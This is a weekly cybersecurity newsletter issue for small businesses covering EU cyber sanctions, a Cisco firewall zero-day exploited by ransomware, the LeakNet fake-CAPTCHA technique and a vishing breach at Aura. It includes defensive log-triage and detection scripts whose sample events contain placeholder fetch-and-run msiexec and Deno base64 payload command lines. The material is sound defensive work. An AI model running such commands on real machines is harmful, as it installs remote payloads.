
#CyberWeekly

Mar 16 - Mar 22, 2026

EU names and sanctions the Chinese and Iranian companies behind years of cyberattacks on Europe

Source: Council of the EU

On March 16, the EU Council publicly named five actors — three companies, two individuals — responsible for state-sponsored cyberattacks against EU member states and their partners, and placed them under the EU's cyber sanctions regime. It's a rare move: the EU usually keeps attribution quiet. This week, it didn't.

  • Integrity Technology Group (China): between 2022 and 2023, this Beijing company's tools compromised more than 65,000 devices across six EU member states. The EU didn't say "allegedly" — it said the company "routinely provided products used to compromise and access devices"
  • Anxun Information Technology (China): provided hacking services aimed directly at critical infrastructure and critical functions across EU member states and third countries. Also known as I-Soon, previously exposed in a leaked document dump in 2024
  • Emennet Pasargad (Iran): the private Iranian company that ran cyberattacks against Charlie Hebdo in 2023 and then targeted the Paris 2024 Olympic and Paralympic Games. The Olympics attack included DDoS campaigns and disinformation operations
  • Two Chinese co-founders of one of the above companies are also individually listed, making them personally subject to asset freezes and EU travel bans

With these five new listings, the EU's horizontal cyber sanctions regime now covers 19 individuals and 7 entities. What this means practically: asset freezes, travel bans, and a public record that makes doing business with these actors illegal for EU companies. For SMEs, the takeaway isn't about sanctions — it's about who's in the threat landscape. Chinese state-linked contractors and Iranian private companies are actively targeting European infrastructure. Your CyFun controls exist precisely because these threats are real and named.

EU Council: full press release →

Cisco firewall zero-day CVSS 10.0: Interlock ransomware had root access 36 days before anyone knew

The device meant to protect your network from attackers became the attackers' entry point. CVE-2026-20131 is a CVSS 10.0 flaw in Cisco Secure Firewall Management Center (FMC) — the admin console used to manage Cisco firewall fleets. An unauthenticated attacker on the network sends a crafted HTTP request, bypasses authentication, and executes arbitrary code as root. Amazon threat intelligence confirmed active exploitation by Interlock ransomware.

  • Zero-day timeline: Cisco disclosed the vulnerability on March 4, 2026. Interlock had been exploiting it since January 26 — 36 days of active attacks before a patch even existed. During that window, every unpatched Cisco FMC instance was a potential ransomware entry point
  • Attack chain: crafted HTTP request → authentication bypass → arbitrary Java code execution as root → ELF binary fetched from attacker server → full network access. The attacker never needs credentials
  • SharePoint also needs patching: CISA added CVE-2026-20963 (CVSS 8.8, Microsoft SharePoint deserialization) to its Known Exploited Vulnerabilities catalog on March 18, with a federal patch deadline of March 21. If your organization runs SharePoint on-premise, this is a P1
  • What Interlock does next: once inside via FMC, the group deploys ScreenConnect for persistence, moves laterally, and eventually encrypts. The firewall admin console is their lateral movement launchpad

The pattern here isn't new — it's just getting faster. Zero-day exploitation windows are shrinking from months to weeks to days. Patch management needs to be a defined process, not a "we'll get to it" activity. For Cisco FMC specifically: isolate the management interface from general network access, verify your version is patched, and check your FMC logs from January 26 onwards for the PUT request pattern described in Amazon's threat intel report.
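A starting point for the log check above, added here as an illustration and not code from Cisco, Amazon or the newsletter: it walks an exported access log, keeps only PUT requests dated on or after January 26, 2026, and tallies them per source address so the rare management-interface PUTs stand out. The Common Log Format, the request path and the RFC 5737 addresses in the sample are constructed; FMC's real log layout and the exact request signature from Amazon's report are not on this page, so substitute them when you run this against real data.

```python
"""Tally PUT requests in the CVE-2026-20131 exposure window.

Constructed example: assumes a Common Log Format export of the FMC
management-interface web log. The path and addresses below are placeholders.
"""
import re
from datetime import date, datetime

# Date the newsletter gives for the start of Interlock's exploitation.
WINDOW_START = date(2026, 1, 26)

# CLF: ip ident user [timestamp] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one PUT before the window, two inside it, two GETs.
SAMPLE_LOG = """\
198.51.100.4 - admin [20/Jan/2026:09:12:01 +0000] "GET /ui/login HTTP/1.1" 200 5123
203.0.113.7 - - [20/Jan/2026:11:40:33 +0000] "PUT /PLACEHOLDER_ENDPOINT HTTP/1.1" 401 0
203.0.113.7 - - [27/Jan/2026:03:14:07 +0000] "PUT /PLACEHOLDER_ENDPOINT HTTP/1.1" 200 0
203.0.113.7 - - [27/Jan/2026:03:14:09 +0000] "PUT /PLACEHOLDER_ENDPOINT HTTP/1.1" 200 0
198.51.100.4 - admin [27/Jan/2026:08:00:00 +0000] "GET /ui/dashboard HTTP/1.1" 200 9001
"""


def parse_line(line):
    """Parse one CLF line into a dict, or return None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "user": m.group("user"),
        "date": ts.date(),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def puts_in_window(lines, window_start=WINDOW_START):
    """Return every PUT request dated on or after window_start."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and entry["method"] == "PUT" and entry["date"] >= window_start:
            hits.append(entry)
    return hits


def put_sources(lines, window_start=WINDOW_START):
    """Count in-window PUT requests per source IP for quick triage."""
    counts = {}
    for entry in puts_in_window(lines, window_start):
        counts[entry["ip"]] = counts.get(entry["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for ip, n in put_sources(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {n} PUT request(s) since {WINDOW_START}")
    for hit in puts_in_window(SAMPLE_LOG.splitlines()):
        print(hit["date"], hit["ip"], hit["path"], hit["status"])
```

Any source that sends PUTs to the management console and is not a known administrator or orchestration host is worth pulling the full session for; on a correctly isolated management interface the list of candidate sources should be very short.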

Hacker News: Cisco FMC zero-day →

LeakNet ransomware's new trick: you visit a legitimate website, paste one command, and your files disappear

The CAPTCHA that encrypts your files

LeakNet ransomware has a new entry method — and it doesn't require you to click a suspicious email or download a shady file. The group now compromises legitimate websites and injects fake CAPTCHA verification prompts. You land on a real site you've visited before. A verification dialog appears. You follow the steps. You've just run a malicious msiexec.exe command from your Windows Run dialog, and the payload is already executing in memory.

  • The ClickFix technique: the fake CAPTCHA instructs you to open the Windows Run dialog and paste a command. The command looks like a verification step. It's actually an msiexec.exe call that fetches and runs the ransomware payload. No email. No download prompt. Just copy, paste, Enter
  • Deno in-memory loader: LeakNet feeds the actual malicious payload to Deno (a JavaScript runtime) as a base64-encoded data URL. Deno decodes and executes it entirely in memory — no file ever touches disk, so traditional antivirus has nothing to scan
  • Wide-net strategy: LeakNet isn't targeting a specific industry. It compromises any website it can and serves the fake CAPTCHA to whoever visits. Currently averaging ~3 victims per month, but scaling up as the technique spreads
  • What makes this dangerous for SMEs: your employees visit supplier websites, client portals, local news sites. Any of those could be compromised and serving this prompt right now. The attack bypasses email filters entirely

Defense: social engineering awareness is the primary control here — your staff should know that no legitimate website will ever ask them to open the Run dialog and paste a command. That is always an attack. Application control policies that restrict msiexec.exe from running user-initiated commands add a second layer. And if your ransomware response plan doesn't cover in-memory payloads that leave no disk trace, now is the time to update it.
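For the second layer, the following heuristic is an added example written for this page, not LeakNet's code or anything from BleepingComputer's report. It classifies process-creation events using two signals the chain above exposes: msiexec.exe started from the Run dialog (whose parent is explorer.exe) with a remote package URL, and Deno started with an inline base64 data: URL. The event fields are assumed to follow Sysmon Event ID 1 (Image, ParentImage, CommandLine), and the sample events, hostnames and payload string are constructed placeholders.

```python
"""Flag ClickFix-style msiexec and Deno in-memory loader executions.

Constructed example: events are assumed to carry Sysmon Event ID 1 fields.
Hostnames, paths and the base64 payload below are placeholders.
"""
import re
from pathlib import PureWindowsPath

# A remote package handed to msiexec is fetched over HTTP at install time.
REMOTE_PKG_RE = re.compile(r"https?://", re.IGNORECASE)
# Inline payload delivered as a data: URL, never written to disk.
DATA_URL_RE = re.compile(r"\bdata:[\w./+-]*;base64,", re.IGNORECASE)

# Constructed events: two benign, two matching the described chain.
SAMPLE_EVENTS = [
    {   # Managed software deployment: service parent, local .msi
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Program Files\DeployAgent\agent.exe",
        "CommandLine": r'msiexec.exe /i "C:\Packages\office-update.msi" /qn',
    },
    {   # Pasted into the Run dialog (explorer.exe parent), remote package
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "msiexec /i https://compromised-site.invalid/PLACEHOLDER.msi /qn",
    },
    {   # Developer running a local script: not flagged
        "Image": r"C:\Users\dev\.deno\bin\deno.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "deno run main.ts",
    },
    {   # In-memory loader: payload passed as a base64 data URL (parent assumed)
        "Image": r"C:\Users\dev\.deno\bin\deno.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "deno run data:application/javascript;base64,UExBQ0VIT0xERVI=",
    },
]


def _basename(image):
    """Lower-case file name of a Windows image path, e.g. 'msiexec.exe'."""
    return PureWindowsPath(image).name.lower()


def classify(event):
    """Return the name of the rule that fires for one event, or None."""
    image = _basename(event["Image"])
    parent = _basename(event["ParentImage"])
    cmd = event["CommandLine"]
    if image == "msiexec.exe" and parent == "explorer.exe" and REMOTE_PKG_RE.search(cmd):
        return "msiexec_remote_package_from_run_dialog"
    if image in ("deno.exe", "deno") and DATA_URL_RE.search(cmd):
        return "deno_inline_data_url_payload"
    return None


def triage(events):
    """Return (rule, command line) for every event that matches a rule."""
    findings = []
    for event in events:
        rule = classify(event)
        if rule:
            findings.append((rule, event["CommandLine"]))
    return findings


if __name__ == "__main__":
    for rule, cmd in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

The explorer.exe parent is what distinguishes a user pasting into the Run dialog from a deployment agent or installer calling msiexec legitimately; an allow-list of known deployment parents is the natural tuning knob if the first rule is noisy in your environment.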

BleepingComputer: LeakNet analysis →

ShinyHunters hacked an identity protection company — via one phone call to one employee

Source: Help Net Security

Aura is a company that sells identity protection. Its product monitors for breaches, alerts customers when their data appears online, and promises to keep personal information safe. On March 19, Aura confirmed that ShinyHunters had stolen 900,000 customer records — names, email addresses, phone numbers, physical addresses, IP addresses, and customer service comments. The method: a targeted voice phishing call to a single employee. One call. Roughly one hour of access. 903,100 accounts on Have I Been Pwned.

  • What happened: an Aura employee received a targeted phone call from someone posing as IT support. The attacker convinced the employee to hand over account access. The attacker had that access for approximately one hour before detection
  • Scale vs. access time: one hour was enough to exfiltrate contact records for 900,000 people. Aura says fewer than 20,000 active and 15,000 former customers had data accessed — the rest appear to be older records. No passwords, SSNs, or financial data were in scope
  • ShinyHunters: the same group behind the 2024 Ticketmaster breach (560M records), the Santander breach, and dozens of others. They now appear to be running a parallel Salesforce Experience Cloud campaign targeting 400+ companies using a weaponized internal security tool
  • The irony writes itself: a company whose entire value proposition is protecting identities was defeated by a social engineering call — not a technical exploit, not a zero-day. The most advanced threat actor doesn't need one when a phone call works just as well

For Belgian SMEs and MSPs, the lesson isn't "Aura should have known better." The lesson is that no technical security stack protects against an employee who's been socially engineered. Every organization — including security vendors — needs social engineering awareness training, strict verification protocols for IT support calls, and call-back verification before anyone hands over account access. Your access control policies should define what IT support is and isn't allowed to ask for on the phone. Write it down. Train it. Test it.

Help Net Security: Aura breach →

Tom Janssens

Editor, #CyberWeekly — LinkedIn

easycyberprotection.com